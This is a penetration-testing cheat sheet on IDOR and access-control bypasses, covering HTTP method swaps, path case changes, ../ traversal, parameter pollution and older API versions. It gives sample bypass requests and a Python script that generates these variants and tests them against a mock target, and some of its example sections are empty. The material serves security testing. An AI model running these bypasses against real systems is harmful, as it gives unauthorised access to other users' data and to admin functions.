Insecure Direct Object Reference (IDOR)

Change HTTP method

The authorization rule may be bound to a single verb while the handler answers to several; if one method is denied, try the others (POST, PUT, PATCH, DELETE, HEAD, OPTIONS).

GET /users/delete/123 -> 403
POST /users/delete/123 -> 200

Change file extension

Try changing the extension of the endpoint you found: an access rule that matches the exact path can be skipped when the router still serves the same resource under a different extension.
#Endpoint found
/users/password -> 401
#Endpoints to test

Convert request body

Convert the request body to an array, or nest the JSON inside another object. The authorization check and the handler may parse the body differently, so one can miss the identifier that the other still acts on.
#Original body

Test wildcards

Replace the identifier in the request with a wildcard; a lax matcher on the backend may treat it as "all objects" while the access check sees no specific ID to deny.
#Original request
#Wildcard bypasses

Check another version

Many API endpoints expose the version in the request path; try an older version, which may predate the authorization check or still be routed to a less protected handler.
#Original request
#Changed version of the same endpoint

Missing Function Level Access Control (MFLAC)

The access rule compares the path case-sensitively while the router matches it case-insensitively, so a change of case reaches the protected function without being checked.

GET /admin/profile -> 401
GET /ADMIN/profile -> 200

Path Traversal Secondary Context

The front end (proxy or gateway) authorizes the raw path, which starts with your own ID, while the backend normalizes the ../ and operates on the victim's ID.

#Original request
POST /users/delete/123 -> 403
#Bypass
POST /users/delete/MY_ID/../123 -> 200

HTTP Parameter Pollution

Send the parameter twice: the authorization layer may read the first occurrence and the data layer the last (or the reverse, depending on the framework), so test both orders.

GET /api/v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID
GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATTACKER_ID
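The checks above are mechanical, so they are worth scripting. The following is an added example, not code from the original page or from any tool it names: it builds the variants from the checklist (method, extension, body shape, wildcards, older version, case, secondary-context traversal, parameter pollution) for one request and keeps those whose status flips from denied to allowed. mock_send() is a constructed stand-in for a target with deliberate flaws, and the extension and wildcard lists, the attacker ID 42 and the victim ID 1337 are assumptions; for a live test swap in a sender that performs the HTTP request and returns the status code.

```python
# Added example, not code from the original page: build the bypass variants from the
# checklist above for one request and keep those whose status flips from denied to
# allowed. mock_send() is a constructed target; replace it with a real sender for live tests.
import json
import posixpath
import re
from dataclasses import dataclass, replace

METHODS = ("GET", "POST", "PUT", "PATCH", "DELETE", "HEAD", "OPTIONS")
EXTENSIONS = (".json", ".xml", ".html", ".txt")  # assumption: extensions worth appending
WILDCARDS = ("*", "%", "_", ".", "?")            # assumption: tokens a lax matcher may honour
MY_ID = "42"                                     # the attacker's own id in the constructed target

@dataclass(frozen=True)
class Req:
    method: str
    path: str                 # path plus optional query, e.g. /api/v2/x?id=1
    body: str = ""
    note: str = ""            # which mutation produced this variant

def _split(path):             # "/a/b?x=1" -> ("/a/b", "x=1")
    return path.partition("?")[::2]
def _join(p, q):
    return f"{p}?{q}" if q else p

def method_variants(req):
    return [replace(req, method=m, note=f"method {m}") for m in METHODS if m != req.method]

def extension_variants(req):
    p, q = _split(req.path)
    return [replace(req, path=_join(p + e, q), note=f"ext {e}") for e in EXTENSIONS]

def body_variants(req):
    """JSON object body as an array, then each value as an array and as a nested object."""
    obj = json.loads(req.body) if req.body else None
    if not isinstance(obj, dict):
        return []
    out = [replace(req, body=json.dumps([obj]), note="body as array")]
    for k, v in obj.items():
        out.append(replace(req, body=json.dumps({**obj, k: [v]}), note=f"{k} as array"))
        out.append(replace(req, body=json.dumps({**obj, k: {k: v}}), note=f"{k} as object"))
    return out

def wildcard_variants(req, ident):
    p, q = _split(req.path)
    return [replace(req, path=_join(p.replace(ident, w), q), note=f"wildcard {w}")
            for w in WILDCARDS if ident in p]

def version_variants(req):
    m = re.search(r"/v(\d+)/", req.path)            # older versions only: vN-1 down to v1
    return [replace(req, path=req.path.replace(m.group(0), f"/v{i}/", 1), note=f"version v{i}")
            for i in range(int(m.group(1)) - 1, 0, -1)] if m else []

def case_variants(req):
    p, q = _split(req.path)
    segs = p.split("/")
    return [replace(req, path=_join("/".join(segs[:i] + [alt] + segs[i + 1:]), q), note=f"case {alt}")
            for i, s in enumerate(segs)
            for alt in dict.fromkeys((s.upper(), s.capitalize())) if alt != s]

def traversal_variants(req, my_id, target):
    p, q = _split(req.path)
    return [replace(req, path=_join(p.replace(target, f"{my_id}/{dots}{target}"), q), note=f"traversal {dots}")
            for dots in ("../", "..%2f") if target in p]

def hpp_variants(req, param, my_id, target):
    p, q = _split(req.path)
    rest = [kv for kv in q.split("&") if kv and not kv.startswith(param + "=")]
    return [replace(req, path=_join(p, "&".join(rest + [f"{param}={a}", f"{param}={b}"])), note=f"hpp {a},{b}")
            for a, b in ((my_id, target), (target, my_id))]

def find_bypasses(baseline, variants, send):
    """(variant, status) for every variant the target accepts while it denies the baseline."""
    if send(baseline) < 400:
        return []
    return [(v, s) for v in variants if (s := send(v)) < 300]

def mock_send(req):
    """Constructed target: the ACL inspects the raw request, the router a normalised one."""
    p, q = _split(req.path)
    if p.startswith("/admin"):                                   # case-sensitive; router is not
        return 401
    if p.startswith("/users/delete/") and req.method == "GET" \
            and not p.startswith(f"/users/delete/{MY_ID}"):      # GET only; raw prefix, no normalisation
        return 403
    m = re.search(r"(?:^|&)user_id=([^&]*)", q)                  # ACL reads the first user_id only
    if p.startswith("/api/v1/messages") and m and m.group(1) != MY_ID:
        return 403
    canon = posixpath.normpath(p).lower()
    return 200 if re.fullmatch(r"/users/delete/\d+|/admin/profile|/api/v1/messages", canon) else 404

def demo():
    """Checklist against the mock -> {scenario: notes of the variants that got through}."""
    delete, admin = Req("GET", "/users/delete/123"), Req("GET", "/admin/profile")
    msgs = Req("GET", "/api/v1/messages?user_id=1337")           # 1337: victim id (constructed)
    runs = {"delete": (delete, method_variants(delete) + extension_variants(delete)
                       + wildcard_variants(delete, "123") + traversal_variants(delete, MY_ID, "123")),
            "admin": (admin, case_variants(admin)),
            "messages": (msgs, hpp_variants(msgs, "user_id", MY_ID, "1337"))}
    return {k: [v.note for v, _ in find_bypasses(b, vs, mock_send)] for k, (b, vs) in runs.items()}

if __name__ == "__main__":
    for name, notes in demo().items():
        print(name, "->", notes or "no bypass")
```

Against the mock, the delete endpoint falls to every non-GET method and to the ../ traversal (but not to the URL-encoded form, since this backend does not decode before normalising), the admin page falls to the case change on the "admin" segment only, and the messages endpoint falls to exactly one parameter order. Against a real target, diff bodies as well as status codes: a 200 that returns an error page is not a bypass.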

Tools

Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
Auto Repeater
Burp Suite extension that automatically repeats requests, with replacement rules and response diffing